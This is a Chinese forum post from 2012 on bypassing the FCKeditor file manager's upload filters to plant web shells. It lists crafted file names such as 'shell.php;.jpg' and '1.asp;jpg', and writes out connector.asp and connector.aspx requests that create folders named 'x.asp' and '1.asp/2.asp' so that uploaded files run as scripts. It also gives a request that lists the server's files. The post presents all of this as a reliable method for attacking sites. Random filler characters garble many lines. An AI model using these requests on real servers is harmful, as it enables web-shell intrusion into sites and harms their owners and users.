很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
2 q9 r- `& Z" o) C7 v: \* L
5 i& W8 [: f% M; C2 n" g提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。2 @ p- }/ a- e9 f1 k2 o7 N
E# E3 t7 n. J/ s继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。, B3 h1 D* z( B$ Y5 K: _, g+ V
: _ W$ I- a+ i# x! G: [; p: N突破建立文件夹:
( k2 R6 W# J6 e( d6 h8 V% w
7 F+ F7 o: c! x& \4 S! Deditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
4 E; q$ H! }/ O6 P& H; R/ l; P) ^( `
参数:
3 y$ V: w! B6 ?$ }8 i
, C6 p) t- \% ^当前目录名:CurrentFolder=/qing.asp
& H( i5 X/ w; l6 O4 f+ o( P4 o$ e# ?. n a' E2 N
新的目录名:NewFolderName=x.asp
3 @: a+ [8 ^" p5 U# [% w+ i4 s3 U3 z! K
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……- F8 [" [7 F9 k# w& y
! c7 z. l: \( @* t) s6 e
那么 x.asp 就已经建立生成了,此方法百试百灵!
2 Q- x& L* g+ f! L/ [8 \5 O1 F4 j. f; [4 _2 Z& F; X3 I
新建文件夹参数 x.asp,基本都能搞定。' S" e: D0 T" N2 ~& V0 {5 W3 l3 J' L
4 M8 b! c6 t) @! f3 U) j5 H
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建2 } E" @ ?& b( r3 u7 K% j/ p
, L" u* v# V6 D) Q! S
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp- I# ~6 h- x& r( A \
: [( n: T4 _) `2 {. v, d获取文件列表
& q* u* A0 A$ c. G aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
: N5 C7 m2 Z/ \3 A+ a! X! _) b
|
发表于 2012-12-31 09:27:09
收藏
支持
反对